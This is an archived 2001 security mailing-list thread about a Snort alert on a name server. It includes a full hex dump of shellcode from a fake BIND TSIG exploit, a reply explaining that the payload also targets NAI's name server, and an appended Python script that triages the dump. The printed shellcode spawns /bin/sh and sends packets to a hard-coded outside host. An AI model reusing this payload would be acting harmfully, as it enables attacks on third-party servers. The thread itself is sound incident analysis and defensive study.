Security Incidents mailing list archives

Re: Named TSIG exploit ?


From: Paul Cardon <paul () MOQUIJO COM>
Date: Mon, 5 Feb 2001 16:48:52 -0500

The source ran the fake BIND TSIG exploit released on BUGTRAQ last week
using your system as the intended target.  Pretty sad since it means
they were also (unknowingly?) attacking NAI's name server.

-paul


Mihai Moldovanu wrote:

[**] IDS362 - MISC - Shellcode X86 NOPS-UDP [**]
02/01-09:31:30.076442 0:10:7B:40:91:C0 -> 0:1:2:F7:76:B8 type:0x800
len:0x22A
141.85.31.233:1025 -> OurNameServer:53 UDP TTL:60 TOS:0x0 ID:0  DF
Len: 520
00 D0 84 00 00 01 00 00 00 00 00 01 00 CD 80 83  ................
C4 08 3D 04 00 18 01 7C 05 E8 15 00 00 00 E8 80  ..=....|........
00 00 00 E8 53 49 47 4E 41 54 55 52 45 E8 52 53  ....SIGNATURE.RS
41 00 00 EB 34 5E BB 01 00 00 00 89 F1 B8 66 00  A...4^........f.
00 00 CD 80 89 46 14 8D 46 30 89 46 18 31 C0 89  .....F..F0.F.1..
46 20 8D 46 0C 89 46 24 B8 66 00 00 00 BB 0B 00  F .F..F$.f......
00 00 8D 4E 14 CD 80 EB EF E8 C7 FF FF FF 02 00  ...N............
00 00 02 00 00 00 11 00 00 00 02 00 00 35 A1 45  .............5.E
03 96 FF FF FF FF EF FF FF FF 00 04 00 00 00 00  ................
00 00 02 5F 9A 80 10 00 00 00 2F 62 69 6E 2F 73  ..._....../bin/s
68 00 00 EB 37 5E 6A 11 6A 02 6A 02 6A 66 8D 05  h...7^j.j.j.jf..
61 00 00 00 CD 80 89 C2 6A 10 89 F0 50 31 C0 50  a.......j...P1.P
68 24 10 00 00 8D 46 0F 50 52 68 88 00 00 00 8D  h$....F.PRh.....
05 85 00 00 00 CD 80 83 C4 1C EB DC E8 C4 FF FF  ................
FF 00 02 00 35 A1 45 03 96 E8 B1 FF FF FF 2F 62  ....5.E......./b
69 6E 2F 73 68 00 00 90 90 90 90 90 90 90 90 90  in/sh...........
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

The shellcode inside the second packet is pretty strange. Can anyone
take a deeper look at it?

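A triage script for the dump above, added here as an example and not part of either message: it rebuilds the raw payload from Snort's hex/ASCII rows, decodes the twelve bytes that sit where a DNS header should be, measures the 0x90 run, pulls printable strings, counts `int 0x80` sequences, and scans for x86 Linux `struct sockaddr_in` literals. The embedded input is the alert's own dump copied byte for byte but cut after the first two full NOP rows; everything else (function names, the heuristics) is the example's own.

```python
import re
import struct

# Constructed sample input: the Snort payload dump quoted in the alert above,
# copied byte for byte but truncated after two full lines of 0x90 (the
# original continues with fourteen more NOP rows).
SNORT_DUMP = """\
00 D0 84 00 00 01 00 00 00 00 00 01 00 CD 80 83  ................
C4 08 3D 04 00 18 01 7C 05 E8 15 00 00 00 E8 80  ..=....|........
00 00 00 E8 53 49 47 4E 41 54 55 52 45 E8 52 53  ....SIGNATURE.RS
41 00 00 EB 34 5E BB 01 00 00 00 89 F1 B8 66 00  A...4^........f.
00 00 CD 80 89 46 14 8D 46 30 89 46 18 31 C0 89  .....F..F0.F.1..
46 20 8D 46 0C 89 46 24 B8 66 00 00 00 BB 0B 00  F .F..F$.f......
00 00 8D 4E 14 CD 80 EB EF E8 C7 FF FF FF 02 00  ...N............
00 00 02 00 00 00 11 00 00 00 02 00 00 35 A1 45  .............5.E
03 96 FF FF FF FF EF FF FF FF 00 04 00 00 00 00  ................
00 00 02 5F 9A 80 10 00 00 00 2F 62 69 6E 2F 73  ..._....../bin/s
68 00 00 EB 37 5E 6A 11 6A 02 6A 02 6A 66 8D 05  h...7^j.j.j.jf..
61 00 00 00 CD 80 89 C2 6A 10 89 F0 50 31 C0 50  a.......j...P1.P
68 24 10 00 00 8D 46 0F 50 52 68 88 00 00 00 8D  h$....F.PRh.....
05 85 00 00 00 CD 80 83 C4 1C EB DC E8 C4 FF FF  ................
FF 00 02 00 35 A1 45 03 96 E8 B1 FF FF FF 2F 62  ....5.E......./b
69 6E 2F 73 68 00 00 90 90 90 90 90 90 90 90 90  in/sh...........
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
"""

HEX_ROW = re.compile(r'(?:[0-9A-Fa-f]{2} ?)+')


def parse_snort_hexdump(dump):
    """Rebuild the raw payload from Snort's '<hex bytes>  <ascii>' rows.
    Rows that are not byte rows (separators, packet headers) are skipped."""
    payload = bytearray()
    for line in dump.splitlines():
        hexpart = line.strip().split('  ', 1)[0]   # two spaces separate hex from ascii
        if hexpart and HEX_ROW.fullmatch(hexpart):
            payload += bytes.fromhex(hexpart)
    return bytes(payload)


def dns_header(payload):
    """Decode the first 12 bytes as a DNS header (RFC 1035 layout)."""
    ident, flags, qd, an, ns, ar = struct.unpack('!6H', payload[:12])
    return {
        'id': ident, 'qr': flags >> 15, 'opcode': (flags >> 11) & 0xF,
        'aa': (flags >> 10) & 1, 'rcode': flags & 0xF,
        'qdcount': qd, 'ancount': an, 'nscount': ns, 'arcount': ar,
    }


def longest_nop_run(payload, nop=0x90):
    """Length of the longest run of single-byte NOPs (the sled the IDS keyed on)."""
    best = cur = 0
    for b in payload:
        cur = cur + 1 if b == nop else 0
        best = max(best, cur)
    return best


def printable_strings(payload, minlen=4):
    """Runs of printable ASCII at least minlen long, in payload order."""
    pattern = rb'[\x20-\x7e]{%d,}' % minlen
    return [m.group().decode('ascii') for m in re.finditer(pattern, payload)]


def sockaddr_in_candidates(payload):
    """Scan for x86 Linux struct sockaddr_in literals: sin_family == AF_INET
    (2 in host order, i.e. bytes 02 00) followed by sin_port and sin_addr in
    network order. Heuristic only: 02 00 also occurs inside code, so each
    (offset, address, port) hit has to be vetted by the analyst."""
    hits = []
    for off in range(len(payload) - 7):
        family = struct.unpack_from('<H', payload, off)[0]
        port = struct.unpack_from('!H', payload, off + 2)[0]
        if family == 2 and port:
            addr = '.'.join(str(b) for b in payload[off + 4:off + 8])
            hits.append((off, addr, port))
    return hits


def triage(dump):
    """One-shot summary of a Snort payload dump."""
    payload = parse_snort_hexdump(dump)
    return {
        'length': len(payload),
        'dns': dns_header(payload),
        'nop_run': longest_nop_run(payload),
        'strings': printable_strings(payload),
        'sockaddrs': sockaddr_in_candidates(payload),
        'int80_count': payload.count(b'\xcd\x80'),   # x86 Linux syscall gadgets
    }


if __name__ == '__main__':
    for key, value in triage(SNORT_DUMP).items():
        print(f'{key}: {value}')
```

On this input the header bytes decode as a DNS response (QR and AA set, QDCOUNT 1, ARCOUNT 1), yet what follows at offset 12 is `int 0x80` code rather than a question name, the strings are `SIGNATURE` and two copies of `/bin/sh`, and the sockaddr scan turns up a hard-coded target of port 53 on 161.69.3.150 at offset 122 (plus a false positive further on, which is why the scan reports candidates rather than verdicts). The hard-coded port-53 target is consistent with Paul's remark that running the posted "exploit" also fires at a name server other than the intended victim.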